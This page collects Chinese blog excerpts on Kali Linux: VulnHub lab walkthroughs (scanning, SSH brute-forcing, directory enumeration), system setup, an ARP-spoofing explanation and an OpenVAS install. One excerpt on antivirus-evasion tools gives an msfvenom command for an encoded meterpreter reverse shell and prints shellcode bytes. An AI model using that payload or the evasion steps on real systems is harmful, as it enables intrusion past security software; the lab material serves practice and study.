kali

kali渗透综合靶机(十二)--SickOs1.2靶机

£可爱£侵袭症+ 提交于 2020-03-09 16:53:17
kali渗透综合靶机(十二)--SickOs1.2靶机 靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/ 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24    二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.170    三、端口服务识别 1. nmap -sV -T4 -O -p 22,80 192.168.10.170    四、漏洞查找与利用 1.浏览器访问http://192.168.10.170,发现发现登录界面,尝试目录扫描,没发现有用信息    2.发现http://192.168.10.170/test/    3.发现ssh的版本OpenSSH 5.9p1,存在用户枚举漏洞,用msf枚举用户得到用户John, root 4.使用hydra进行ssh爆破,没有破解出来 5.发现web服务的版本lighttpd 1.4.28 searchsploit lighttpd,搜索漏洞,发现没有什么可利用的漏洞    6. nmap 192.168.10.170 --script=http-methods.nse --script-args=http.methods.url-path="/test" 扫描

Kali下Metasploit2,windows镜像,centos,ubantu,owasp地址

爷,独闯天下 提交于 2020-03-07 04:40:57
一、Metasploit2地址 https://blog.csdn.net/Elison_zlj/article/details/80933336 二、Windows Edge https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 但是上面微软的地址,由于某些不可明说的理由,一般访问不了,或者是访问速度很慢 我这边有直接的下载地址: https://az792536.vo.msecnd.net/vms/VMBuild_20190311/VMware/MSEdge/MSEdge.Win10.VMware.zip 三、Windows 各个版本的镜像文件(纯净版) https://msdn.itellyou.cn/ 一般在系统处有对应的下载,用迅雷下载即可 四、CentOS7站点 常用:http://mirrors.aliyun.com/centos/7/isos/x86_64/CentOS-7-x86_64-DVD-1908.iso 阿里云是真的好用,推荐以后下载先找阿里云的站点! https://www.jianshu.com/p/a63f47e096e8 五、ubantu 14.04,16.04,18.04版本下载地址(阿里云) https://www.cnblogs.com/wangjq19920210/p

PWN环境搭建(三)

一曲冷凌霜 提交于 2020-03-07 04:04:09
步骤总览: 一、vm虚拟机安装 二、kali虚拟机搭建 三、pwn工具安装,pwntools,兼容32位,gdb等 (二) kali 虚拟机搭建 点击终端,输入 sudo vim /etc/apt/sources.list sudo 是 root 权限执行的意思, vim 是 kali 自带的一个强大编辑器的名字,后面的是 sources.list 这个文件的打开路径。 现在将里面原来的的全部删掉 , 然后加上阿里云和中科大的源,格式要和我图中保持一致不然会识别错误。保存退出, vim 的保存退出操作是“ esc 键”——“冒号”——“ wq ” #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib 终端输入 apt-get clean &&

kali linux系统配置 避免踩坑

折月煮酒 提交于 2020-03-06 08:45:48
使用kali一个多月,重新安装kail也三次了,下面是安装完系统后,做如下系统配置,必须要做的配置,让自己以后不要踩坑。 kail更新系统 1.添加更新源,前面已经介绍,不再多说 2获取更新数据,命令: apt-get update & apt-get upgrade 3.更新系统的核心阶段,命令: apt-get dist-upgrade 4.所有软件包更新成功后,重启系统,输入如下命令: reboot 注意:部分软件包可能会有提醒,手动选择下就ok了。 由于网络原因,很可能会更新失败,这个时候通过VPN或者Socks代理进行FQ就很有必要了。 Kali Linux安装Google中文输入法 (只需5步) 1、添加更新源 命令: vi /etc/apt/sources.list 注意:如果你网络很好的话,建议就用官方的kali源 个人并没有选择这么多源 我自己选择的源: #kali官方源 deb http://http.kali.org/kali kali-rolling main non-free contrib #中科大的源 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 输入如下内容: #163网易 Kali源 deb http://mirrors.163.com/debian

免杀工具汇总

两盒软妹~` 提交于 2020-03-04 08:31:12
今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。 DKMC 项目地址: https://github.com/Mr-Un1k0d3r/DKMC 可以创建一个 outputs 文件夹 存放 shellcode 启动 python dkmc.py 操作顺序: Sc :是将 msf 生成的 raw 文件转换位 shellcode 代码 Gen :是将其 msf 的 shellcode 注入到 BMP 图片中 Ps :将其 BMP 的图片转换为 powershell 代码 Web :将其开启 web 功能 第一步,先生成原始的 shellcode msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.174 lport=7777 -e x86/shikata_ga_nai -i 16 -f raw -o /root/DKMC/dk 第二步,生成 shellcode ,将生成的 shellcode 保存到文本里,exit 退出 \xdb\xc3\xb8\xa4\x85\xc1\x7d\xd9\x74\x24\xf4\x5e\x31\xc9\xb1\xbb\x83\xee\xfc\x31\x46\x15\x03\x46\x15\x46\x70\x7f\xa8\x6b

Kali Linux的安装教程

主宰稳场 提交于 2020-03-04 03:16:59
Kali Linux的安装教程 1.在 官网 下载kali镜像 我这里下载的是当前最新版本 2.打开VMware>创建新的虚拟机>典型>稍后安装操作系统 3.选择操作系统选择“linux”,版本选择“Ubuntu” 4.自定义名称和位置>最大磁盘大小我给了40G 个人认为20G,对于经常玩Kali的朋友来说是不够的 5.空白的虚拟机就建好了 6.编辑虚拟机设置>添加镜像文件 7.开启此虚拟机 8.选择“Graphical install” 版本不一样,位置可能不一样,看清楚了选择“Graphical install” 9.有自信的选“English”,不然还是老老实实选中文吧 10.中国>汉语>等待 11.主机名>域名可以空着 12.设置用户名和密码>等待 13.向导-使用整个磁盘>将所有文件放在同一个分区中>结束分区设定并将修改写入磁盘>是>等待 14.留空>软件选择>等待 15.是>/dev/sda>等待 16.重启即安装完毕 来源: CSDN 作者: Web Security Loop 链接: https://blog.csdn.net/weixin_44716769/article/details/104630925

kali渗透综合靶机(七)--Super-Mario-Host靶机

為{幸葍}努か 提交于 2020-03-03 00:26:40
kali渗透综合靶机(七)--Super-Mario-Host靶机 靶机百度云下载 链接:https://pan.baidu.com/s/13l1FUgJjXArfoTOfcmPsbA 提取码:a8ox 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24    二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.160    三、端口服务识别 1.nmap -sV -T4 -O 192.168.10.160 -p 22,80    四、漏洞发现与利用 1.扫描网站目录 Dirb http://192.168.10.161:8180    2.发现http://192.168.10.161:8180/vhosts    3. 在本地hosts文件添加解析记录    4.浏览器访问http://mario.supermariohost.local:8180/,别的什么都没有    5. 使用dirbuster扫描目录,扫描出来如下目录    6. 发现http://mario.supermariohost.local:8180/luigi.php    7. 发现http://mario.supermariohost.local:8180/command.php 测试luigi,发现存在  

linux下的ARP攻击(kali)

不打扰是莪最后的温柔 提交于 2020-03-02 16:14:43
这是我的学习总结,刚入坑网络安全,写的不好或者有什么错误的希望大佬们指正 首先了解ARP的作用以及原理: ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP栈中的网络层,负责将某个ip地址解析成对应的MAC地址,ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行,当然还有最重要的一点 它一般只能在内网进行,无法对外网(互联、非本区域内的局域网)进行攻击。 ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。攻击者向电脑A发送一个伪造的ARP响应,告诉电脑A:电脑B的IP地址192.168.100.2对应的MAC地址是00-aa-00-62-c6-03,电脑A信以为真,将这个对应关系写入自己的ARP缓存表中,以后发送数据时,将本应该发往电脑B的数据发送给了攻击者。同样的,攻击者向电脑B也发送一个伪造的ARP响应,告诉电脑B:电脑A的IP地址192.168.100.1对应的MAC地址是00-aa-00-62-c6-03,电脑B也会将数据发送给攻击者。至此攻击者就控制了电脑A和电脑B之间的流量,他可以选择被动地监测流量,获取密码和其他涉密信息

修改Kali Linux 2020.1主题颜色

送分小仙女□ 提交于 2020-03-02 01:24:29
修改Kali Linux 2020.1主题颜色 Kali Linux 2020.1安装后,默认主题颜色为Kali-Dark。用户使用的图形界面工具,界面颜色也都是黑乎乎,很多人都不喜欢。这里将分别介绍下修改主题颜色的方法: (1)如果用户安装的是XFCE桌面,可以切换为kali-undercover主题,类似Windows 10桌面。执行命令如下所示: kali-undercover (2)如果是GNOME桌面,用户则需要手动修改外观颜色。执行命令如下所示: gnome-tweaks 执行以上命令后,将打开优化的通用设置界面。在左侧栏选择“外观”,修改主题中应用程序为Kali-Light即可。 来源: oschina 链接: https://my.oschina.net/u/1585857/blog/3183071

Kali Linux安装OpenVAS

这一生的挚爱 提交于 2020-03-01 00:13:59
Kali Linux安装OpenVAS OpenVAS是一个开放式漏洞评估系统,可以用来实施各种漏洞扫描。但是,大部分系统默认没有安装。一些用户在安装过程中,会碰到各种问题,如扫描服务丢失、初始化失败等。对于这些问题,都是由于网络不稳定所导致的。为了帮助用户顺利安装OpenVAS,下面介绍安装OpenVAS的详细步骤。如下所示: (1)安装OpenVAS软件包。执行命令如下所示: apt-get install openvas -y (2)初始化OpenVAS。执行命令如下所示: openvas-setup (3)修改默认用户admin密码。例如,设置密码为123456。如下所示: openvasmd --user=admin --new-password=123456 (4)验证OpenVAS安装的完整性。如下所示: openvas-check-setup (5)访问OpenVAS服务。在浏览器中输入https://127.0.0.1:9392/,将弹出链接不被信任界面。此时,根据提示信任其链接,将成功打开登录界面。然后,输入用户名和密码,即可成功打开OpenVAS主界面。 来源: oschina 链接: https://my.oschina.net/u/1585857/blog/3179682